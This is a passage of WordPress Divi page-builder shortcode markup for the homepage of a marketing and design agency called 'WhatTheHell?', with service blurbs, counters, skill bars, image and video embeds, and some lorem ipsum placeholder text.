custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/63368-2.png\" alt=\"Why We\" title_text=\"Best Agency to choose\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-Copy-12.png\" alt=\"digital advertising\" title_text=\"digital advertising\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" 